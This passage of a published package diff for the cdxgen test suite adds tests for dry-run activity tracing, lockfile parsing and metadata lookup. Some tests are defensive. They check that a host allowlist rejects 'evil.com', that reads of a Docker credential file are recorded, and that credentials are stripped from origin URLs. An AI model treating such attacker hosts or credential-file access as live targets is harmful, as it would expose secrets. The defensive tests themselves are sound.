@cyclonedx/cdxgen 12.3.2 → 12.4.0

package/lib/helpers/utils.poku.js

@@ -1,14 +1,16 @@
 import { Buffer } from "node:buffer";
 import {
+  chmodSync,
   existsSync,
   mkdirSync,
   mkdtempSync,
   readFileSync,
   rmSync,
+  symlinkSync,
   unlinkSync,
   writeFileSync,
 } from "node:fs";
-import { tmpdir } from "node:os";
+import { platform, tmpdir } from "node:os";
 import path from "node:path";
 import process from "node:process";
 
@@ -21,14 +23,23 @@ import { parse as loadYaml } from "yaml";
 
 import { validateRefs } from "../validator/bomValidator.js";
 import {
+  addEvidenceForDotnet,
+  addEvidenceForImports,
+  attachIdentityTools,
   buildObjectForCocoaPod,
   buildObjectForGradleModule,
+  cdxgenAgent,
+  collectExecutables,
+  collectSharedLibs,
   convertOSQueryResults,
   encodeForPurl,
+  extractToolRefs,
   findLicenseId,
   findPnpmPackagePath,
+  getAllFiles,
   getCratesMetadata,
   getDartMetadata,
+  getDefaultBomAuditCategories,
   getLicenses,
   getMvnMetadata,
   getPropertyGroupTextNodes,
@@ -37,6 +48,7 @@ import {
   guessPypiMatchingVersion,
   hasAnyProjectType,
   inferJarGroupFromManifest,
+  isAllowedHttpHost,
   isDryRunError,
   isPackageManagerAllowed,
   isPartialTree,
@@ -59,6 +71,7 @@ import {
   parseCmakeDotFile,
   parseCmakeLikeFile,
   parseCocoaDependency,
+  parseColliderLockData,
   parseComposerJson,
   parseComposerLock,
   parseConanData,
@@ -127,14 +140,19 @@ import {
   parseYarnLock,
   pnpmMetadata,
   purlFromUrlString,
+  readEnvironmentVariable,
   readZipEntry,
+  recordSensitiveFileRead,
+  recordSymlinkResolution,
   resetRecordedActivities,
+  safeExistsSync,
   safeMkdtempSync,
   safeRmSync,
   safeSpawnSync,
   safeUnlinkSync,
   safeWriteSync,
   setDryRunMode,
+  shouldRunPredictiveBomAudit,
   splitOutputByGradleProjects,
   toGemModuleNames,
   trimJarGroupSuffix,
@@ -143,6 +161,23 @@ import {
 
 const jarMetadataFixturesDir = path.resolve("test", "data", "jar-metadata");
 
+function createMockedProcess(envOverrides = {}) {
+  const env = {
+    ...process.env,
+  };
+  for (const [key, value] of Object.entries(envOverrides)) {
+    if (value === undefined) {
+      delete env[key];
+    } else {
+      env[key] = value;
+    }
+  }
+  const mockedProcess = Object.create(process);
+  mockedProcess.argv = [...process.argv];
+  mockedProcess.env = env;
+  return mockedProcess;
+}
+
 function readJarMetadataFixture(...segments) {
   return readFileSync(path.join(jarMetadataFixturesDir, ...segments), {
     encoding: "utf-8",
@@ -275,15 +310,320 @@ it("safeSpawnSync() returns a dry-run sentinel result when dry run mode is enabl
     const result = safeSpawnSync("node", ["--version"], {});
     assert.strictEqual(result.status, 1);
     assert.ok(isDryRunError(result.error));
-    const activities = getRecordedActivities();
-    assert.strictEqual(activities[0].kind, "execute");
-    assert.strictEqual(activities[0].status, "blocked");
+    const executeActivity = getRecordedActivities().find(
+      (activity) => activity.kind === "execute",
+    );
+    assert.ok(executeActivity);
+    assert.strictEqual(executeActivity.status, "blocked");
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() does not classify non-probe -v commands as version checks", () => {
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    safeSpawnSync("swift", ["package", "-v", "resolve"], {});
+    const executeActivity = getRecordedActivities().find(
+      (activity) => activity.kind === "execute",
+    );
+    assert.ok(executeActivity);
+    assert.strictEqual(executeActivity.probeType, undefined);
+    assert.ok(!/version check/i.test(executeActivity.reason));
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() reads CDXGEN_ALLOWED_COMMANDS once per invocation", () => {
+  const originalAllowedCommands = process.env.CDXGEN_ALLOWED_COMMANDS;
+  process.env.CDXGEN_ALLOWED_COMMANDS = "echo-cdxgen-test";
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    safeSpawnSync("echo-cdxgen-test", ["value"], {});
+    const envActivities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_ALLOWED_COMMANDS",
+    );
+    assert.strictEqual(envActivities.length, 1);
+    assert.strictEqual(envActivities[0].count, 1);
+  } finally {
+    if (originalAllowedCommands === undefined) {
+      delete process.env.CDXGEN_ALLOWED_COMMANDS;
+    } else {
+      process.env.CDXGEN_ALLOWED_COMMANDS = originalAllowedCommands;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() records stdout and stderr byte sizes in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: "echo-cdxgen-test",
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:child_process": {
+      spawnSync: sinon.stub().returns({
+        status: 0,
+        stdout: "hello",
+        stderr: "warn",
+      }),
+    },
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  utilsModule.resetRecordedActivities();
+  utilsModule.safeSpawnSync("echo-cdxgen-test", ["value"], {});
+  const executeActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "execute" &&
+        activity.target === "echo-cdxgen-test value",
+    );
+  assert.ok(executeActivity);
+  assert.strictEqual(executeActivity.stdoutBytes, 5);
+  assert.strictEqual(executeActivity.stderrBytes, 4);
+  utilsModule.resetRecordedActivities();
+});
+
+it("safeExtractArchive() records source byte size in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: undefined,
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-archive-trace-"));
+  const sourcePath = path.join(tempDir, "archive.zip");
+  const targetPath = path.join(tempDir, "extracted");
+  mkdirSync(targetPath, { recursive: true });
+  writeFileSync(sourcePath, "abc");
+  utilsModule.resetRecordedActivities();
+  await utilsModule.safeExtractArchive(
+    sourcePath,
+    targetPath,
+    async () => {
+      writeFileSync(path.join(targetPath, "a.txt"), "hello");
+      mkdirSync(path.join(targetPath, "nested"), { recursive: true });
+      writeFileSync(path.join(targetPath, "nested", "b.txt"), "xy");
+    },
+    "unzip",
+  );
+  const archiveActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "unzip" &&
+        activity.target === `${sourcePath} -> ${targetPath}`,
+    );
+  assert.ok(archiveActivity);
+  assert.strictEqual(archiveActivity.status, "completed");
+  assert.strictEqual(archiveActivity.sourceBytes, 3);
+  rmSync(tempDir, { recursive: true, force: true });
+});
+
+it("safeExtractArchive() records failed extraction activity in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: undefined,
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-archive-trace-"));
+  const sourcePath = path.join(tempDir, "archive.tar");
+  const targetPath = path.join(tempDir, "extracted");
+  mkdirSync(targetPath, { recursive: true });
+  writeFileSync(sourcePath, "abcd");
+  utilsModule.resetRecordedActivities();
+  const extractionError = new Error("permission denied");
+  extractionError.code = "EACCES";
+  await assert.rejects(
+    utilsModule.safeExtractArchive(
+      sourcePath,
+      targetPath,
+      async () => {
+        throw extractionError;
+      },
+      "untar",
+    ),
+    extractionError,
+  );
+  const archiveActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "untar" &&
+        activity.target === `${sourcePath} -> ${targetPath}`,
+    );
+  assert.ok(archiveActivity);
+  assert.strictEqual(archiveActivity.status, "failed");
+  assert.strictEqual(archiveActivity.errorCode, "EACCES");
+  assert.strictEqual(archiveActivity.sourceBytes, 4);
+  rmSync(tempDir, { recursive: true, force: true });
+});
+
+it("records dry-run environment variable reads via helper access", () => {
+  const originalEnvValue = process.env.CDXGEN_TEST_ENV_READ;
+  process.env.CDXGEN_TEST_ENV_READ = "trace-me";
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    readEnvironmentVariable("CDXGEN_TEST_ENV_READ");
+    readEnvironmentVariable("CDXGEN_TEST_ENV_READ");
+    const activities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_TEST_ENV_READ",
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "env");
+    assert.match(activities[0].reason, /2 times/);
+  } finally {
+    if (originalEnvValue === undefined) {
+      delete process.env.CDXGEN_TEST_ENV_READ;
+    } else {
+      process.env.CDXGEN_TEST_ENV_READ = originalEnvValue;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("isAllowedHttpHost() honors exact and wildcard host allowlists", () => {
+  const originalAllowedHosts = process.env.CDXGEN_ALLOWED_HOSTS;
+  try {
+    process.env.CDXGEN_ALLOWED_HOSTS = "example.com,*.trusted.test";
+    assert.strictEqual(isAllowedHttpHost("example.com"), true);
+    assert.strictEqual(isAllowedHttpHost("api.trusted.test"), true);
+    assert.strictEqual(isAllowedHttpHost("trusted.test"), false);
+    assert.strictEqual(isAllowedHttpHost("evil.com"), false);
+  } finally {
+    if (originalAllowedHosts === undefined) {
+      delete process.env.CDXGEN_ALLOWED_HOSTS;
+    } else {
+      process.env.CDXGEN_ALLOWED_HOSTS = originalAllowedHosts;
+    }
+  }
+});
+
+it("deduplicates sensitive file read activity entries in dry-run mode", () => {
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    recordSensitiveFileRead("/tmp/docker/config.json", {
+      label: "Docker credential file",
+    });
+    recordSensitiveFileRead("/tmp/docker/config.json", {
+      label: "Docker credential file",
+    });
+    const activities = getRecordedActivities().filter(
+      (activity) => activity.target === "/tmp/docker/config.json",
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "read");
+    assert.match(activities[0].reason, /2 times/);
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("records classified manifest and config inspections in dry-run mode", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-inspect-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  const settingsXmlFile = path.join(tmpRoot, "settings.xml");
+  writeFileSync(packageJsonFile, "{}");
+  writeFileSync(settingsXmlFile, "<settings />");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    assert.ok(safeExistsSync(packageJsonFile));
+    assert.ok(safeExistsSync(settingsXmlFile));
+    const activities = getRecordedActivities().filter((activity) =>
+      [packageJsonFile, settingsXmlFile].includes(activity.target),
+    );
+    assert.strictEqual(activities.length, 2);
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.kind),
+      ["inspect", "inspect"],
+    );
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.classification),
+      ["manifest", "config"],
+    );
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
+  }
+});
+
+it("records recursive file discovery activity in dry-run mode", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-glob-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  writeFileSync(packageJsonFile, "{}");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    const files = getAllFiles(tmpRoot, "**/package.json");
+    assert.deepStrictEqual(files, [packageJsonFile]);
+    const activities = getRecordedActivities().filter((activity) =>
+      activity.target.includes("**/package.json"),
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "discover");
+    assert.strictEqual(activities[0].discoveryType, "manifest-discovery");
   } finally {
     setDryRunMode(false);
     resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
   }
 });
 
+it("records updated discovery activity when a repeated glob match count changes", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-glob-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  const nestedDir = path.join(tmpRoot, "nested");
+  const nestedPackageJsonFile = path.join(nestedDir, "package.json");
+  writeFileSync(packageJsonFile, "{}");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    getAllFiles(tmpRoot, "**/package.json");
+    mkdirSync(nestedDir, { recursive: true });
+    writeFileSync(nestedPackageJsonFile, "{}");
+    getAllFiles(tmpRoot, "**/package.json");
+    const activities = getRecordedActivities().filter((activity) =>
+      activity.target.includes("**/package.json"),
+    );
+    assert.strictEqual(activities.length, 2);
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.matchedCount),
+      [1, 2],
+    );
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
+  }
+});
 it("dry-run filesystem wrappers do not mutate the filesystem", () => {
   const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-"));
   const fileToKeep = path.join(tmpRoot, "keep.txt");
@@ -439,6 +779,37 @@ it("cdxgenAgent records completed and failed network activity outcomes", async (
   }
 });
 
+it("cdxgenAgent reads CDXGEN_ALLOWED_HOSTS once per request", () => {
+  const originalAllowedHosts = process.env.CDXGEN_ALLOWED_HOSTS;
+  try {
+    process.env.CDXGEN_ALLOWED_HOSTS = "example.com";
+    const beforeRequestHook =
+      cdxgenAgent.defaults.options.hooks.beforeRequest[0];
+
+    setDryRunMode(true);
+    resetRecordedActivities();
+    assert.throws(() =>
+      beforeRequestHook({
+        context: {},
+        url: new URL("https://example.com/resource"),
+      }),
+    );
+    const envActivities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_ALLOWED_HOSTS",
+    );
+    assert.strictEqual(envActivities.length, 1);
+    assert.strictEqual(envActivities[0].count, 1);
+  } finally {
+    if (originalAllowedHosts === undefined) {
+      delete process.env.CDXGEN_ALLOWED_HOSTS;
+    } else {
+      process.env.CDXGEN_ALLOWED_HOSTS = originalAllowedHosts;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
 it("safeSpawnSync() logs container python notices to stdout", () => {
   const originalConsoleLog = console.log;
   const originalConsoleWarn = console.warn;
@@ -1276,6 +1647,84 @@ it("get py metadata", async () => {
   ]);
 }, 240000);
 
+it("get py metadata adds distribution external references", async () => {
+  const agentGetStub = sinon.stub().resolves({
+    body: {
+      info: {
+        author: "",
+        author_email: "",
+        classifiers: [],
+        license: "",
+        license_expression: "",
+        name: "requests",
+        summary: "HTTP client",
+        version: "2.31.0",
+      },
+      releases: {
+        "2.31.0": [
+          {
+            digests: { sha256: "abc123" },
+            filename: "requests-2.31.0-py3-none-any.whl",
+            packagetype: "bdist_wheel",
+            url: "https://files.pythonhosted.org/packages/example/requests-2.31.0-py3-none-any.whl",
+          },
+          {
+            digests: { sha256: "def456" },
+            filename: "requests-2.31.0.tar.gz",
+            packagetype: "sdist",
+            url: "https://files.pythonhosted.org/packages/example/requests-2.31.0.tar.gz",
+          },
+        ],
+      },
+    },
+  });
+  const { getPyMetadata: mockedGetPyMetadata } = await esmock("./utils.js", {
+    got: {
+      default: {
+        extend: sinon.stub().returns({ get: agentGetStub }),
+      },
+    },
+  });
+  const data = await mockedGetPyMetadata(
+    [
+      {
+        externalReferences: [
+          {
+            type: "website",
+            url: "https://example.com/requests",
+          },
+        ],
+        group: "",
+        name: "requests",
+        version: "2.31.0",
+      },
+    ],
+    true,
+  );
+  assert.strictEqual(data.length, 1);
+  assert.ok(
+    data[0].externalReferences?.some(
+      (reference) => reference.type === "website",
+    ),
+  );
+  assert.ok(
+    data[0].externalReferences?.some(
+      (reference) =>
+        reference.type === "distribution" &&
+        reference.url.endsWith(".whl") &&
+        reference.comment === "requests-2.31.0-py3-none-any.whl",
+    ),
+  );
+  assert.ok(
+    data[0].externalReferences?.some(
+      (reference) =>
+        reference.type === "distribution" &&
+        reference.url.endsWith(".tar.gz") &&
+        reference.comment === "requests-2.31.0.tar.gz",
+    ),
+  );
+});
+
 it("parseGoModData", async () => {
   let retMap = await parseGoModData(null);
   assert.deepStrictEqual(retMap, {});
@@ -2305,6 +2754,49 @@ bindgen = { version = "0.70.0", default-features = false }
   }
 });
 
+it("parse cargo toml captures git dependency metadata", async () => {
+  const tmpDir = mkdtempSync(path.join(tmpdir(), "cdxgen-cargo-git-"));
+  const cargoTomlFile = path.join(tmpDir, "Cargo.toml");
+  writeFileSync(
+    cargoTomlFile,
+    `[package]
+name = "demo"
+version = "1.0.0"
+
+[dependencies]
+git-crate = { git = "https://github.com/acme/git-crate.git", branch = "main" }
+`,
+  );
+  try {
+    const depList = await parseCargoTomlData(cargoTomlFile);
+    const gitDep = depList.find((pkg) => pkg.name === "git-crate");
+    assert.ok(gitDep);
+    assert.strictEqual(
+      gitDep.version,
+      "git+https://github.com/acme/git-crate.git",
+    );
+    assert.strictEqual(
+      gitDep.properties.find((property) => property.name === "cdx:cargo:git")
+        ?.value,
+      "https://github.com/acme/git-crate.git",
+    );
+    assert.strictEqual(
+      gitDep.properties.find(
+        (property) => property.name === "cdx:cargo:gitBranch",
+      )?.value,
+      "main",
+    );
+    assert.strictEqual(
+      gitDep.properties.find(
+        (property) => property.name === "cdx:cargo:dependencyKind",
+      )?.value,
+      "runtime",
+    );
+  } finally {
+    rmSync(tmpDir, { force: true, recursive: true });
+  }
+});
+
 it("parse cargo virtual workspace with inherited package and dependency metadata", async () => {
   const workspaceDir = "./test/data/cargo-workspace-repotest";
   const workspaceToml = path.join(workspaceDir, "Cargo.toml");
@@ -2825,77 +3317,292 @@ it("parse conan data", () => {
   });
 });
 
-it("conan package reference mapper to pURL", () => {
-  const checkParseResult = (inputPkgRef, expectedPurl) => {
-    const [purl, name, version] =
-      mapConanPkgRefToPurlStringAndNameAndVersion(inputPkgRef);
-    assert.deepStrictEqual(purl, expectedPurl);
-
-    const expectedPurlPrefix = `pkg:conan/${name}@${version}`;
-    assert.deepStrictEqual(
-      purl.substring(0, expectedPurlPrefix.length),
-      expectedPurlPrefix,
-    );
-  };
-
-  checkParseResult("testpkg", "pkg:conan/testpkg@latest");
-
-  checkParseResult("testpkg/1.2.3", "pkg:conan/testpkg@1.2.3");
-
-  checkParseResult(
-    "testpkg/1.2.3#recipe_revision",
-    "pkg:conan/testpkg@1.2.3?rrev=recipe_revision",
-  );
-
-  checkParseResult(
-    "testpkg/1.2.3@someuser/somechannel",
-    "pkg:conan/testpkg@1.2.3?channel=somechannel&user=someuser",
-  );
-
-  checkParseResult(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision",
-    "pkg:conan/testpkg@1.2.3?channel=somechannel&rrev=recipe_revision&user=someuser",
+it("parse collider lock data", () => {
+  let colliderLockData = parseColliderLockData(null);
+  assert.deepStrictEqual(colliderLockData.pkgList.length, 0);
+  assert.deepStrictEqual(Object.keys(colliderLockData.dependencies).length, 0);
+  assert.deepStrictEqual(
+    colliderLockData.parentComponentDependencies.length,
+    0,
   );
 
-  checkParseResult(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#package_revision",
-    "pkg:conan/testpkg@1.2.3" +
-      "?channel=somechannel" +
-      "&prev=package_revision" +
-      "&rrev=recipe_revision" +
-      "&user=someuser",
+  colliderLockData = parseColliderLockData(
+    readFileSync("./test/data/collider.lock", { encoding: "utf-8" }),
+    "./test/data/collider.lock",
   );
-
-  const expectParseError = (pkgRef) => {
-    const result = mapConanPkgRefToPurlStringAndNameAndVersion(pkgRef);
-    assert.deepStrictEqual(result[0], null);
-    assert.deepStrictEqual(result[1], null);
-    assert.deepStrictEqual(result[2], null);
-  };
-
-  expectParseError("testpkg/"); // empty version
-  expectParseError("testpkg/1.2.3@"); // empty user
-  expectParseError("testpkg/1.2.3@someuser"); // pkg ref is not allowed to stop here
-  expectParseError("testpkg/1.2.3@someuser/"); // empty channel
-  expectParseError("testpkg/1.2.3@someuser/somechannel#"); // empty recipe revision
-  expectParseError("testpkg/1.2.3@someuser/somechannel#recipe_revision:"); // empty package id
-  expectParseError(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id",
-  ); // pkg ref is not allowed to stop here
-  expectParseError(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#",
-  ); // empty package revision
-  expectParseError("testpkg/1.2.3/unexpected"); // unexpected pkg ref segment separator
-  expectParseError("testpkg/1.2.3@someuser/somechannel/unexpected"); // unexpected pkg ref segment separator
-  expectParseError(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision/unexpected",
-  ); // unexpected pkg ref segment separator
-  expectParseError(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id/unexpected",
-  ); // unexpected pkg ref segment separator
-  expectParseError(
-    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#package_revision/unexpected",
-  ); // unexpected pkg ref segment separator
+  assert.deepStrictEqual(colliderLockData.pkgList.length, 3);
+  assert.deepStrictEqual(colliderLockData.pkgList[0], {
+    name: "fmt",
+    version: "11.0.2",
+    "bom-ref": "pkg:generic/fmt@11.0.2",
+    externalReferences: [
+      {
+        type: "distribution",
+        url: "https://packages.example.com/collider/v2/",
+      },
+    ],
+    hashes: [
+      {
+        alg: "SHA-256",
+        content:
+          "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+      },
+    ],
+    properties: [
+      { name: "SrcFile", value: "./test/data/collider.lock" },
+      { name: "cdx:collider:dependencyKind", value: "direct" },
+      {
+        name: "cdx:collider:wrapHash",
+        value:
+          "sha256:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+      },
+      { name: "cdx:collider:hasWrapHash", value: "true" },
+      {
+        name: "cdx:collider:origin",
+        value: "https://packages.example.com/collider/v2/",
+      },
+      { name: "cdx:collider:originScheme", value: "https" },
+      { name: "cdx:collider:originHost", value: "packages.example.com" },
+    ],
+    purl: "pkg:generic/fmt@11.0.2",
+    scope: "required",
+  });
+  assert.deepStrictEqual(colliderLockData.pkgList[1], {
+    name: "spdlog",
+    version: "1.15.0",
+    "bom-ref": "pkg:generic/spdlog@1.15.0",
+    externalReferences: [
+      {
+        type: "distribution",
+        url: "https://packages.example.com/collider/v2/",
+      },
+    ],
+    hashes: [
+      {
+        alg: "SHA-256",
+        content:
+          "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
+      },
+    ],
+    properties: [
+      { name: "SrcFile", value: "./test/data/collider.lock" },
+      { name: "cdx:collider:dependencyKind", value: "direct" },
+      {
+        name: "cdx:collider:wrapHash",
+        value:
+          "sha256:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
+      },
+      { name: "cdx:collider:hasWrapHash", value: "true" },
+      {
+        name: "cdx:collider:origin",
+        value: "https://packages.example.com/collider/v2/",
+      },
+      { name: "cdx:collider:originScheme", value: "https" },
+      { name: "cdx:collider:originHost", value: "packages.example.com" },
+    ],
+    purl: "pkg:generic/spdlog@1.15.0",
+    scope: "required",
+  });
+  assert.deepStrictEqual(colliderLockData.pkgList[2], {
+    name: "fast_float",
+    version: "8.0.2",
+    "bom-ref": "pkg:generic/fast_float@8.0.2",
+    externalReferences: [
+      {
+        type: "distribution",
+        url: "https://wrapdb.mesonbuild.com/v2/",
+      },
+    ],
+    hashes: [
+      {
+        alg: "SHA-256",
+        content:
+          "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc",
+      },
+    ],
+    properties: [
+      { name: "SrcFile", value: "./test/data/collider.lock" },
+      { name: "cdx:collider:dependencyKind", value: "transitive" },
+      {
+        name: "cdx:collider:wrapHash",
+        value:
+          "sha256:cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc",
+      },
+      { name: "cdx:collider:hasWrapHash", value: "true" },
+      {
+        name: "cdx:collider:origin",
+        value: "https://wrapdb.mesonbuild.com/v2/",
+      },
+      { name: "cdx:collider:originScheme", value: "https" },
+      { name: "cdx:collider:originHost", value: "wrapdb.mesonbuild.com" },
+    ],
+    purl: "pkg:generic/fast_float@8.0.2",
+  });
+  assert.deepStrictEqual(colliderLockData.dependencies, {
+    "pkg:generic/fmt@11.0.2": [],
+    "pkg:generic/spdlog@1.15.0": [],
+    "pkg:generic/fast_float@8.0.2": [],
+  });
+  assert.deepStrictEqual(colliderLockData.parentComponentDependencies, [
+    "pkg:generic/fmt@11.0.2",
+    "pkg:generic/spdlog@1.15.0",
+  ]);
+});
+
+it("parse collider lock data sanitizes origin metadata and tracks invalid wrap hashes", () => {
+  const colliderLockData = parseColliderLockData(
+    JSON.stringify({
+      version: 1,
+      dependencies: {
+        "unsafe-origin": {
+          version: "1.0.0",
+          wrap_hash:
+            "sha256:dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd",
+          origin: "https://user:pass@example.com/private/v2/?token=secret#frag",
+        },
+      },
+      packages: {
+        malformed: {
+          version: "2.0.0",
+          wrap_hash: "not-a-sha256",
+          origin: "http://mirror.example.com/collider/v2/?sig=123",
+        },
+        "bad-origin": {
+          version: "3.0.0",
+          wrap_hash:
+            "sha256:eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee",
+          origin: "://not a url",
+        },
+      },
+    }),
+    "/repo/collider.lock",
+  );
+  assert.strictEqual(colliderLockData.pkgList.length, 3);
+  const unsafeOrigin = colliderLockData.pkgList.find(
+    (pkg) => pkg.name === "unsafe-origin",
+  );
+  const malformed = colliderLockData.pkgList.find(
+    (pkg) => pkg.name === "malformed",
+  );
+  const badOrigin = colliderLockData.pkgList.find(
+    (pkg) => pkg.name === "bad-origin",
+  );
+  assert.deepStrictEqual(
+    unsafeOrigin.properties.find(
+      (property) => property.name === "cdx:collider:origin",
+    )?.value,
+    "https://example.com/private/v2/",
+  );
+  assert.deepStrictEqual(
+    unsafeOrigin.properties.find(
+      (property) => property.name === "cdx:collider:originSanitized",
+    )?.value,
+    "true",
+  );
+  assert.deepStrictEqual(unsafeOrigin.externalReferences, [
+    {
+      type: "distribution",
+      url: "https://example.com/private/v2/",
+    },
+  ]);
+  assert.deepStrictEqual(
+    malformed.properties.find(
+      (property) => property.name === "cdx:collider:hasWrapHash",
+    )?.value,
+    "false",
+  );
+  assert.deepStrictEqual(
+    malformed.properties.find(
+      (property) => property.name === "cdx:collider:wrapHashInvalid",
+    )?.value,
+    "true",
+  );
+  assert.deepStrictEqual(
+    malformed.properties.find(
+      (property) => property.name === "cdx:collider:origin",
+    )?.value,
+    "http://mirror.example.com/collider/v2/",
+  );
+  assert.ok(!malformed.hashes);
+  assert.ok(
+    !badOrigin.properties.some(
+      (property) => property.name === "cdx:collider:origin",
+    ),
+  );
+  assert.ok(!badOrigin.externalReferences);
+});
+
+it("conan package reference mapper to pURL", () => {
+  const checkParseResult = (inputPkgRef, expectedPurl) => {
+    const [purl, name, version] =
+      mapConanPkgRefToPurlStringAndNameAndVersion(inputPkgRef);
+    assert.deepStrictEqual(purl, expectedPurl);
+
+    const expectedPurlPrefix = `pkg:conan/${name}@${version}`;
+    assert.deepStrictEqual(
+      purl.substring(0, expectedPurlPrefix.length),
+      expectedPurlPrefix,
+    );
+  };
+
+  checkParseResult("testpkg", "pkg:conan/testpkg@latest");
+
+  checkParseResult("testpkg/1.2.3", "pkg:conan/testpkg@1.2.3");
+
+  checkParseResult(
+    "testpkg/1.2.3#recipe_revision",
+    "pkg:conan/testpkg@1.2.3?rrev=recipe_revision",
+  );
+
+  checkParseResult(
+    "testpkg/1.2.3@someuser/somechannel",
+    "pkg:conan/testpkg@1.2.3?channel=somechannel&user=someuser",
+  );
+
+  checkParseResult(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision",
+    "pkg:conan/testpkg@1.2.3?channel=somechannel&rrev=recipe_revision&user=someuser",
+  );
+
+  checkParseResult(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#package_revision",
+    "pkg:conan/testpkg@1.2.3" +
+      "?channel=somechannel" +
+      "&prev=package_revision" +
+      "&rrev=recipe_revision" +
+      "&user=someuser",
+  );
+
+  const expectParseError = (pkgRef) => {
+    const result = mapConanPkgRefToPurlStringAndNameAndVersion(pkgRef);
+    assert.deepStrictEqual(result[0], null);
+    assert.deepStrictEqual(result[1], null);
+    assert.deepStrictEqual(result[2], null);
+  };
+
+  expectParseError("testpkg/"); // empty version
+  expectParseError("testpkg/1.2.3@"); // empty user
+  expectParseError("testpkg/1.2.3@someuser"); // pkg ref is not allowed to stop here
+  expectParseError("testpkg/1.2.3@someuser/"); // empty channel
+  expectParseError("testpkg/1.2.3@someuser/somechannel#"); // empty recipe revision
+  expectParseError("testpkg/1.2.3@someuser/somechannel#recipe_revision:"); // empty package id
+  expectParseError(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id",
+  ); // pkg ref is not allowed to stop here
+  expectParseError(
+    "testpkg/1.2.3@someuser/somechannel#recipe_revision:package_id#",
+  ); // empty package revision
+  expectParseError("testpkg/1.2.3/unexpected"); // unexpected pkg ref segment separator
